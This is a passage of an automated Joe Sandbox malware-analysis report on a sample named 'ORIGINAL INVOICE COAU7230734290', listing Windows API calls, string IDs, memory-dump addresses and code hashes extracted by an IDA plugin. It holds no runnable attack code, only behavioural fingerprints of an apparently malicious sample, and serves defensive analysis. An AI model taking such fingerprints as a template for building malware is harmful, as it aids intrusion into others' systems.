                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Variant$ClearInit$_memset
                                                              • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop$h?*$|?*
                                                              • API String ID: 2862541840-294147683
                                                              • Opcode ID: 247e37dfac298ceb49a83bcdbff3b83f202b5ac31e33b893012d4d8c10425d3c
                                                              • Instruction ID: 32ab1ca824ecabe07b9bc8bb4c43bdca21f9e92988a16397ed0e307f044e6170
                                                              • Opcode Fuzzy Hash: 247e37dfac298ceb49a83bcdbff3b83f202b5ac31e33b893012d4d8c10425d3c
                                                              • Instruction Fuzzy Hash: CF916C71E20219EFDB29CFA5C884FAEB7B8EF45710F10855AF515AB180DB709954CFA0
                                                              APIs
                                                                • Part of subcall function 001F936C: __swprintf.LIBCMT ref: 001F93AB
                                                                • Part of subcall function 001F936C: __itow.LIBCMT ref: 001F93DF
                                                              • CoInitialize.OLE32 ref: 0024ADF6
                                                              • CoUninitialize.OLE32 ref: 0024AE01
                                                              • CoCreateInstance.OLE32(?,00000000,00000017,0027D8FC,?), ref: 0024AE61
                                                              • IIDFromString.OLE32(?,?), ref: 0024AED4
                                                              • VariantInit.OLEAUT32(?), ref: 0024AF6E
                                                              • VariantClear.OLEAUT32(?), ref: 0024AFCF
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                              • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                              • API String ID: 834269672-1287834457
                                                              • Opcode ID: e555b3c72c6fd99589c203bcaaf16e6dc190cde682f8674df9ff0ef0b6835b70
                                                              • Instruction ID: d6d44072473cb117e5904580388f90fd586cc5d7d12c9c90ff639f5708ad9bfe
                                                              • Opcode Fuzzy Hash: e555b3c72c6fd99589c203bcaaf16e6dc190cde682f8674df9ff0ef0b6835b70
                                                              • Instruction Fuzzy Hash: 9C61BDB1268312EFD715EF64D849B6EB7E8AF89700F004419F9859B291C7B0ED58CB93
                                                              APIs
                                                              • WSAStartup.WSOCK32(00000101,?), ref: 00248168
                                                              • inet_addr.WSOCK32(?,?,?), ref: 002481AD
                                                              • gethostbyname.WSOCK32(?), ref: 002481B9
                                                              • IcmpCreateFile.IPHLPAPI ref: 002481C7
                                                              • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00248237
                                                              • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 0024824D
                                                              • IcmpCloseHandle.IPHLPAPI(00000000), ref: 002482C2
                                                              • WSACleanup.WSOCK32 ref: 002482C8
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                              • String ID: Ping
                                                              • API String ID: 1028309954-2246546115
                                                              • Opcode ID: 548821189d0445e2ef3a922303020365eba349f19cee83ed7ae268a13efa2123
                                                              • Instruction ID: bbd3bae5fc4807ff3ee1d43a7b489925685913217550a48280ca6f35ebfec6f8
                                                              • Opcode Fuzzy Hash: 548821189d0445e2ef3a922303020365eba349f19cee83ed7ae268a13efa2123
                                                              • Instruction Fuzzy Hash: 8951B1316207019FD724EF24DC49B2EB7E4BF48310F04492AFA5ADB2A1DBB0E854CB41
                                                              APIs
                                                              • SetErrorMode.KERNEL32(00000001), ref: 0023E396
                                                              • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0023E40C
                                                              • GetLastError.KERNEL32 ref: 0023E416
                                                              • SetErrorMode.KERNEL32(00000000,READY), ref: 0023E483
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Error$Mode$DiskFreeLastSpace
                                                              • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                              • API String ID: 4194297153-14809454
                                                              • Opcode ID: 0a8df1740b1b4bb48d8a3f641ab84d6053c132bee32f547080b4d78bf74f85b3
                                                              • Instruction ID: 9e2775bbdcc2aa8ddc8817a6f007bf7c6743d4c82cef663793978e0b57263001
                                                              • Opcode Fuzzy Hash: 0a8df1740b1b4bb48d8a3f641ab84d6053c132bee32f547080b4d78bf74f85b3
                                                              • Instruction Fuzzy Hash: 7E31D475A2020A9FDB00EFA4DD45ABDB7B4EF59300F158026F605A72D1DB709915CB80
                                                              APIs
                                                              • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 0022B98C
                                                              • GetDlgCtrlID.USER32 ref: 0022B997
                                                              • GetParent.USER32 ref: 0022B9B3
                                                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 0022B9B6
                                                              • GetDlgCtrlID.USER32(?), ref: 0022B9BF
                                                              • GetParent.USER32(?), ref: 0022B9DB
                                                              • SendMessageW.USER32(00000000,?,?,00000111), ref: 0022B9DE
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$CtrlParent
                                                              • String ID: ComboBox$ListBox
                                                              • API String ID: 1383977212-1403004172
                                                              • Opcode ID: f43b87aa4e70000b5c28677a1a88292a691bcad7f174fc80cb2ba078a18312e3
                                                              • Instruction ID: 0b9556f247aaa9dcc7c606281cf049ae2325438763de64e4f2adbb756b3d2d5b
                                                              • Opcode Fuzzy Hash: f43b87aa4e70000b5c28677a1a88292a691bcad7f174fc80cb2ba078a18312e3
                                                              • Instruction Fuzzy Hash: CE21C4B4900108BFDB05AFA4EC85EFEBB78EF55310B100116F655A3292DBB45865DF60
                                                              APIs
                                                              • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 0022BA73
                                                              • GetDlgCtrlID.USER32 ref: 0022BA7E
                                                              • GetParent.USER32 ref: 0022BA9A
                                                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 0022BA9D
                                                              • GetDlgCtrlID.USER32(?), ref: 0022BAA6
                                                              • GetParent.USER32(?), ref: 0022BAC2
                                                              • SendMessageW.USER32(00000000,?,?,00000111), ref: 0022BAC5
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$CtrlParent
                                                              • String ID: ComboBox$ListBox
                                                              • API String ID: 1383977212-1403004172
                                                              • Opcode ID: fea017c4c2ea4d6e534ab6066384d73af653a1964811c09ad517eee6527761a7
                                                              • Instruction ID: 4ee0a7b044bec3e547ef3ef8e046e0784a5a93de599257b5752fd1df7c013e65
                                                              • Opcode Fuzzy Hash: fea017c4c2ea4d6e534ab6066384d73af653a1964811c09ad517eee6527761a7
                                                              • Instruction Fuzzy Hash: 1021D7B4900118BFDB01EFA4EC85EFEBB79EF45300F100015F555A7192DBB55969DB60
                                                              APIs
                                                              • GetParent.USER32 ref: 0022BAE3
                                                              • GetClassNameW.USER32(00000000,?,00000100), ref: 0022BAF8
                                                              • _wcscmp.LIBCMT ref: 0022BB0A
                                                              • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 0022BB85
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: ClassMessageNameParentSend_wcscmp
                                                              • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                              • API String ID: 1704125052-3381328864
                                                              • Opcode ID: 26f6040f3eb1a63adc4d4c9f176606db9531ec5caab52912b86c8f1792a67290
                                                              • Instruction ID: 28ca155e0754e60fb9368153da3a2d5dac7ff83e4107ffec0fc999858dc7ee36
                                                              • Opcode Fuzzy Hash: 26f6040f3eb1a63adc4d4c9f176606db9531ec5caab52912b86c8f1792a67290
                                                              • Instruction Fuzzy Hash: 2C110A76638313FAFA216A75FC0BDE6379C9F22728B200012FD05E44D6EFE158B15914
                                                              APIs
                                                              • VariantInit.OLEAUT32(?), ref: 0024B2D5
                                                              • CoInitialize.OLE32(00000000), ref: 0024B302
                                                              • CoUninitialize.OLE32 ref: 0024B30C
                                                              • GetRunningObjectTable.OLE32(00000000,?), ref: 0024B40C
                                                              • SetErrorMode.KERNEL32(00000001,00000029), ref: 0024B539
                                                              • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002), ref: 0024B56D
                                                              • CoGetObject.OLE32(?,00000000,0027D91C,?), ref: 0024B590
                                                              • SetErrorMode.KERNEL32(00000000), ref: 0024B5A3
                                                              • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0024B623
                                                              • VariantClear.OLEAUT32(0027D91C), ref: 0024B633
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                              • String ID:
                                                              • API String ID: 2395222682-0
                                                              • Opcode ID: a16c4f18392446122be4ea9c63a72198808e215ef265d738c65502d6e183cb05
                                                              • Instruction ID: 19695e190ce4ad936ca791aeb149670ecd34622d5bffc1d3291cb5e5548ae849
                                                              • Opcode Fuzzy Hash: a16c4f18392446122be4ea9c63a72198808e215ef265d738c65502d6e183cb05
                                                              • Instruction Fuzzy Hash: B5C133B1618305AFC705EF68C88492BBBE9FF88308F00495DF58A9B251DB71ED15CB92
                                                              APIs
                                                              • __lock.LIBCMT ref: 0021ACC1
                                                                • Part of subcall function 00217CF4: __mtinitlocknum.LIBCMT ref: 00217D06
                                                                • Part of subcall function 00217CF4: EnterCriticalSection.KERNEL32(00000000,?,00217ADD,0000000D), ref: 00217D1F
                                                              • __calloc_crt.LIBCMT ref: 0021ACD2
                                                                • Part of subcall function 00216986: __calloc_impl.LIBCMT ref: 00216995
                                                                • Part of subcall function 00216986: Sleep.KERNEL32(00000000,000003BC,0020F507,?,0000000E), ref: 002169AC
                                                              • @_EH4_CallFilterFunc@8.LIBCMT ref: 0021ACED
                                                              • GetStartupInfoW.KERNEL32(?,002A6E28,00000064,00215E91,002A6C70,00000014), ref: 0021AD46
                                                              • __calloc_crt.LIBCMT ref: 0021AD91
                                                              • GetFileType.KERNEL32(00000001), ref: 0021ADD8
                                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 0021AE11
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
                                                              • String ID:
                                                              • API String ID: 1426640281-0
                                                              • Opcode ID: 34a0251aafa2b9dcd0638a2e7d5883c2ef20f52bb7cea4ea1294fc5da940bf1a
                                                              • Instruction ID: 11023f4ce4f84771d9c33afa059606a34fb1a4b47510131b944dc6cd29f52a92
                                                              • Opcode Fuzzy Hash: 34a0251aafa2b9dcd0638a2e7d5883c2ef20f52bb7cea4ea1294fc5da940bf1a
                                                              • Instruction Fuzzy Hash: A581D2709267468FDB24CF68D8845EEBBF0AF25320B24436DD4A6AB3D1C7359893CB51
                                                              APIs
                                                              • GetSysColor.USER32(00000008), ref: 0020B496
                                                              • SetTextColor.GDI32(?,000000FF), ref: 0020B4A0
                                                              • SetBkMode.GDI32(?,00000001), ref: 0020B4B5
                                                              • GetStockObject.GDI32(00000005), ref: 0020B4BD
                                                              • GetClientRect.USER32(?), ref: 0026DD63
                                                              • SendMessageW.USER32(?,00001328,00000000,?), ref: 0026DD7A
                                                              • GetWindowDC.USER32(?), ref: 0026DD86
                                                              • GetPixel.GDI32(00000000,?,?), ref: 0026DD95
                                                              • ReleaseDC.USER32(?,00000000), ref: 0026DDA7
                                                              • GetSysColor.USER32(00000005), ref: 0026DDC5
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
                                                              • String ID:
                                                              • API String ID: 3430376129-0
                                                              • Opcode ID: 47f43a8f7fc93d4ffd5222bae80a83f0d7ea0d608c06eb701cb7187a8d93be05
                                                              • Instruction ID: 5fa0ce4fc18a9ed01ab7434c35053174f84f9f853fb321df41b0c89ce06d5fac
                                                              • Opcode Fuzzy Hash: 47f43a8f7fc93d4ffd5222bae80a83f0d7ea0d608c06eb701cb7187a8d93be05
                                                              • Instruction Fuzzy Hash: 16115B31510206EFDB216FB4FC0CBA97B75EF04325F508665FA6AA50E2CB720A91DF20
                                                              APIs
                                                              • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 001F30DC
                                                              • CoUninitialize.OLE32(?,00000000), ref: 001F3181
                                                              • UnregisterHotKey.USER32(?), ref: 001F32A9
                                                              • DestroyWindow.USER32(?), ref: 00265079
                                                              • FreeLibrary.KERNEL32(?), ref: 002650F8
                                                              • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00265125
                                                              Strings
                                                              Similarity
                                                              • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                              • String ID: close all
                                                              • API String ID: 469580280-3243417748
                                                              • Opcode ID: 41cc0e83a9805a2f94c9b7b1aa2f3084e067d2a866d8213313a317179087a180
                                                              • Instruction ID: 8b1f0304a23833ff7c0bf3a64b2d15f1a8f60ddd86b64a19f9eed75454ed3741
                                                              • Opcode Fuzzy Hash: 41cc0e83a9805a2f94c9b7b1aa2f3084e067d2a866d8213313a317179087a180
                                                              • Instruction Fuzzy Hash: 0291293461021ACFC719EF14D899B78F3A4BF15304F5542A9E61AA7262DF30AE6ACF50
                                                              APIs
                                                              • SetWindowLongW.USER32(?,000000EB), ref: 0020CC15
                                                                • Part of subcall function 0020CCCD: GetClientRect.USER32(?,?), ref: 0020CCF6
                                                                • Part of subcall function 0020CCCD: GetWindowRect.USER32(?,?), ref: 0020CD37
                                                                • Part of subcall function 0020CCCD: ScreenToClient.USER32(?,?), ref: 0020CD5F
                                                              • GetDC.USER32 ref: 0026D137
                                                              • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0026D14A
                                                              • SelectObject.GDI32(00000000,00000000), ref: 0026D158
                                                              • SelectObject.GDI32(00000000,00000000), ref: 0026D16D
                                                              • ReleaseDC.USER32(?,00000000), ref: 0026D175
                                                              • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0026D200
                                                              Strings
                                                              Similarity
                                                              • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                              • String ID: U
                                                              • API String ID: 4009187628-3372436214
                                                              • Opcode ID: ecbb72a7074d6ac806f1528bf5f82c4f6a94e226a43bcadd241822de73b23db4
                                                              • Instruction ID: af309a0cb0b2be2de64bd5ac5428a8678920d5b98588a465a296764330ff68e8
                                                              • Opcode Fuzzy Hash: ecbb72a7074d6ac806f1528bf5f82c4f6a94e226a43bcadd241822de73b23db4
                                                              • Instruction Fuzzy Hash: 50712670A2020ADFCF21CF64DC85AEA3BB5FF49314F24426AED59561A6D7708CA1DF50
                                                              APIs
                                                                • Part of subcall function 0020B34E: GetWindowLongW.USER32(?,000000EB), ref: 0020B35F
                                                                • Part of subcall function 0020B63C: GetCursorPos.USER32(000000FF), ref: 0020B64F
                                                                • Part of subcall function 0020B63C: ScreenToClient.USER32(00000000,000000FF), ref: 0020B66C
                                                                • Part of subcall function 0020B63C: GetAsyncKeyState.USER32(00000001), ref: 0020B691
                                                                • Part of subcall function 0020B63C: GetAsyncKeyState.USER32(00000002), ref: 0020B69F
                                                              • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?), ref: 0025ED3C
                                                              • ImageList_EndDrag.COMCTL32 ref: 0025ED42
                                                              • ReleaseCapture.USER32 ref: 0025ED48
                                                              • SetWindowTextW.USER32(?,00000000), ref: 0025EDF0
                                                              • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0025EE03
                                                              • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?), ref: 0025EEDC
                                                              Strings
                                                              Similarity
                                                              • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                              • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                              • API String ID: 1924731296-2107944366
                                                              • Opcode ID: 88029a6274db10ef175587be99286eb1edc2e855d0d1d24289ad925b85ec04b6
                                                              • Instruction ID: 2baf1acb7a393faa691b7be4b28f6cb731378ea299be7af841648a2bf8a715c6
                                                              • Opcode Fuzzy Hash: 88029a6274db10ef175587be99286eb1edc2e855d0d1d24289ad925b85ec04b6
                                                              • Instruction Fuzzy Hash: 4A51BC30114304AFD714EF20EC9AF6A77F8FB88714F504A1DF995962E2DB709968CB52
                                                              APIs
                                                              • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 002445FF
                                                              • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0024462B
                                                              • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 0024466D
                                                              • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00244682
                                                              • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0024468F
                                                              • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 002446BF
                                                              • InternetCloseHandle.WININET(00000000), ref: 00244706
                                                                • Part of subcall function 00245052: GetLastError.KERNEL32(?,?,002443CC,00000000,00000000,00000001), ref: 00245067
                                                              Strings
                                                              Similarity
                                                              • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
                                                              • String ID:
                                                              • API String ID: 1241431887-3916222277
                                                              • Opcode ID: 5781e60277000043a3bc0e7cb0d4769a152ec612a8231fb73fb787d4492a30bf
                                                              • Instruction ID: ee6bedbb8cb82737a30e803269aea43dc00320d512599f8f6617a93a4f8759a0
                                                              • Opcode Fuzzy Hash: 5781e60277000043a3bc0e7cb0d4769a152ec612a8231fb73fb787d4492a30bf
                                                              • Instruction Fuzzy Hash: 96418EB1511219BFEB0AAF50DC89FBB77ACFF09354F104116FA059A141D7B09D548BA4
                                                              APIs
                                                              • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0028DC00), ref: 0024B715
                                                              • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0028DC00), ref: 0024B749
                                                              • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 0024B8C1
                                                              • SysFreeString.OLEAUT32(?), ref: 0024B8EB
                                                              Similarity
                                                              • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                              • String ID:
                                                              • API String ID: 560350794-0
                                                              • Opcode ID: 9d276be8388a2d94e4542bd4b63f74f57e6e6b1f172247afa7dbd2f530661a01
                                                              • Instruction ID: cd213ed5afd5d2070d434210dd321354740c1932feb574f61a9f370404831ece
                                                              • Opcode Fuzzy Hash: 9d276be8388a2d94e4542bd4b63f74f57e6e6b1f172247afa7dbd2f530661a01
                                                              • Instruction Fuzzy Hash: D1F13871A10219AFCF09DF94C888EAEB7B9FF49315F148458F905AB250DB71EE52CB90
                                                              APIs
                                                              • _memset.LIBCMT ref: 002524F5
                                                              • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00252688
                                                              • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 002526AC
                                                              • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 002526EC
                                                              • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0025270E
                                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0025286F
                                                              • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 002528A1
                                                              • CloseHandle.KERNEL32(?), ref: 002528D0
                                                              • CloseHandle.KERNEL32(?), ref: 00252947
                                                              Similarity
                                                              • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                              • String ID:
                                                              • API String ID: 4090791747-0
                                                              • Opcode ID: 6b6e4da188a62dac41da943207aa495d3913e2be85e1ca3543f38d9b46397a89
                                                              • Instruction ID: dbaf2065259dfb246b48ab6c559d9543d2721565f7dd08b053419512b9aa7689
                                                              • Opcode Fuzzy Hash: 6b6e4da188a62dac41da943207aa495d3913e2be85e1ca3543f38d9b46397a89
                                                              • Instruction Fuzzy Hash: E4D1AB71614201DFCB14EF24C891A6ABBE5AF86310F18855DF8899B2E2DB31DC58CF96
                                                              APIs
                                                              • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0025B3F4
                                                              Similarity
                                                              • API ID: InvalidateRect
                                                              • String ID:
                                                              • API String ID: 634782764-0
                                                              • Opcode ID: 39b503fd226d2a5065cbf9031de5132917d84ea2c73cd9998b19f0b7cd46ef2e
                                                              • Instruction ID: 5b2108de0de5d975624770e375968aedb3a7eeac362804e2779aef2190667194
                                                              • Opcode Fuzzy Hash: 39b503fd226d2a5065cbf9031de5132917d84ea2c73cd9998b19f0b7cd46ef2e
                                                              • Instruction Fuzzy Hash: 9951E330530205BFEF369F28DC99BAD7B68AF04316F644011FE14E61E2D771E9A88B58
                                                              APIs
                                                              • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0026DB1B
                                                              • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0026DB3C
                                                              • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0026DB51
                                                              • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0026DB6E
                                                              • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0026DB95
                                                              • DestroyIcon.USER32(00000000,?,?,?,?,?,?,0020A67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 0026DBA0
                                                              • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0026DBBD
                                                              • DestroyIcon.USER32(00000000,?,?,?,?,?,?,0020A67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 0026DBC8
                                                              Similarity
                                                              • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                              • String ID:
                                                              • API String ID: 1268354404-0
                                                              • Opcode ID: a25974f018535630b63ee5ac0787b36c9f65ad54c1f114b8ac0e3e113bf1ae3c
                                                              • Instruction ID: bc2dda5875ff99b21e5d09d351b85ff3490f1aa1f5c6bfa48276d2f812cbe29f
                                                              • Opcode Fuzzy Hash: a25974f018535630b63ee5ac0787b36c9f65ad54c1f114b8ac0e3e113bf1ae3c
